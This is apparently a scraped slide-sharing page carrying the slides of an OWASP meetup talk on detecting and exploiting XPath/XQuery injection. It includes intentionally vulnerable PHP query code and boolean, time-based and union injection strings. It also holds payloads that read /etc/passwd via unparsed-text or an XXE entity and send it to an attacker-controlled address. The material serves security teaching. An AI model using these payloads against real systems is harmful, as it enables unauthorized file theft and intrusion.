[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov
•
3 gostaram•1,627 visualizações
OWASP Russia Meetup #3
Recomendados
Mais conteúdo relacionado
Mais procurados
Mais procurados (20)
Destaque
Destaque (20)
Semelhante a [3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov
Semelhante a [3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov (20)
Último
Último (9)
[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov
- 1. Detection & exploiting Xpath/Xquery injections. The other ways. Savkov Boris
- 2. What will be discussed today? • Xpath/XQuery • Boolean-based • Time-based • Request-based • Union-based • Xquery DB • XXE in XQuery
- 3. Reasons? • injection class vulnerability • prevalence
- 4. XPath XPath is used to navigate through elements and attributes in an XML document. XPath became a W3C Recommendation 16. November 1999. XPath is a major element in W3C's XSLT standard - and XQuery and XPointer are both built on XPath expressions Standards: 1.0, 2.0, 3.0.
- 5. XPath examples /.../node[@attribute=value]/.../text() • child::text() • child::node() • attribute::node() • child::processing-instruction() • child::comment() • child::namespace-uri() • name(/…/node)
- 6. XPath examples <root> <?xml-stylesheet type="text/css" href="mystyle.css" ?> <namespace xmlns="http://www.w3.org/1999/xhtml"/> <News> <current_news> <page ID="1"> <!-- this is comment1 --> <info>British people are my only 'boss' on EU reform, says David Cameron</info> </page> <page ID="2"> <!-- this is comment1 --> <info>BoE says part of banking payment system down</info> </page> </current_news> </News> </root> /root/News/current_news/page[@ID='1']/info/ //page[1]//text() /*[1]/*[3]/*[1]/*[1]/*[1]/text()
- 7. XQuery XQuery is to XML what SQL is to database tables. XQuery 1.0 became a W3C Recommendation January 23, 2007. XQuery is designed to query XML data - not just XML files, but anything that can appear as XML, including databases. Standards: 1.0, 3.0.
- 8. XQuery examples <root> <?xml-stylesheet type="text/css" href="mystyle.css" ?> <namespace xmlns="http://www.w3.org/1999/xhtml"/> <News> <current_news> <page ID="1"> <!-- this is comment1 --> <info>British people are my only 'boss' on EU reform, says David Cameron</info> </page> <page ID="2"> <!-- this is comment1 --> <info>BoE says part of banking payment system down</info> </page> </current_news> </News> </root> for $i in doc("examples/example.xml")//page[@ID="1"]/info/text() return <h3> {$i} </h3>
- 9. XQuery Databases Sedna 3.5, BaseX 8.11, eXit-db 2.2.
- 10. Boolean-based •count() •string-length() •substring(,,) 1'and count(/*[1])=1 and '1'='1 1'and string-length(name(/*[1]))=4 and '1'='1 1'and substring(name(/*[1]),1,'r')=1 and '1'='1
- 11. XML document <Root> <News ID="1"> <info>British people are my only 'boss' on EU reform, says David Cameron</info> </News> <News ID="2"> <info>BoE says part of banking payment system down</info> </News> <News ID="3"> <info>Current exchange rate US DOLLAR (USD) - ≤50 RUSSIAN RUBLE (RUB)</info> </News> </Root>
- 12. Vulnerable code public function select($param) { $this->session->execute("open ".$this->database); $input = 'for $i in doc("tests/news.xml")//News[@ID="'.$param.'"]'. '/info/text() return <h3> {$i} </h3>'; $query = $this->session->query($input); while($query->more()) { print $query->next()."n"; } $query->close(); }
- 13. 1" and "1"="0
- 14. 1" and "1"="1
- 15. Time-based • root() • if-then • 1'and reverse(-9999 to 9999)=0 and '1'='1
- 17. Vulnerable code public function select($uid, $username) { $this->session->execute("open ".$this->database); $input = 'doc("tests/users.xml")//Users[./UserName="'.$username.'"]/*[name()="UID"]/text()'; $query = $this->session->query($input); if($query->next() === $uid){ $query->close(); $input = 'for $i in doc("tests/users.xml")//Users[./UID="'.$uid.'"]'. '/*[name()="FirstName" or name()="LastName"]/text() return <h3> {$i} </h3>'; $query = $this->session->query($input); while($query->more()) { print $query->next()."n"; } } $query->close(); }
- 18. False
- 19. True
- 20. Request-based •doc •concaten •code-for-uri doc(concat("Your public ip",encode-for-uri(name(/*[1])))
- 22. Remarks • Doesn't work in Sedna • XXE with doc doc(concat("Your public ip",encode-for-uri(doc("Your public ip/XXE.xml")))) • unparsed-text doc(concat("Your public ip",encode-for-uri(unparsed-text("/etc/passwd")))) • XXE and BaseX doc(concat("http://192.168.56.101:9090/",encode-for-uri(doc("<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE input [<!ELEMENT input (#PCDATA)><!ENTITY c SYSTEM '/etc/passwd'>]><input>&c;</input> "))))
- 23. Union-based 0' and 1=0] | //* | /*['0
- 24. Sedna
- 25. BaseX
- 26. eXist-db
- 27. Questions?